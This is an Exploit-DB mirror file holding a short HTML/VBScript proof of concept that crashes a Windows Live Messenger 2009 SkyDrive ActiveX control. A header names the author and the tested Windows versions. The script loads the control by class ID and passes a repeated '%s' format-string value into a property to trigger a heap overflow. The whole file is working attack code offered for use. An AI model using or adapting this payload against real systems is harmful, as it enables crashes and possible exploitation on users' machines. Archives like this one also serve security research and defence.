exploit-db-mirror/exploits/windows/dos/11214.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

19 lines
No EOL
712 B
HTML

#Aouther : [SarBoT511] (xs3@hotmail.com)
#Exploits title :[Windows Live Messenger 2009 ActiveX Heap Overflow PoC]
#tested on :[windows 7 & Vista & Xp sp3]
#Windows Live Messenger SkyDrive 2009
<html>
<object classid='clsid:C2828995-4A83-4100-A212-3024BA117356' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Windows Live SkyDrive\Microsoft.Live.Folders.RichUpload.3.dll"
prototype = "Property Let RichUploadControlContextData As String"
memberName = "RichUploadControlContextData"
progid = "RichUploadLib.UploadControl"
argCount = 1
arg1="%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s"
target.RichUploadControlContextData = arg1
</script>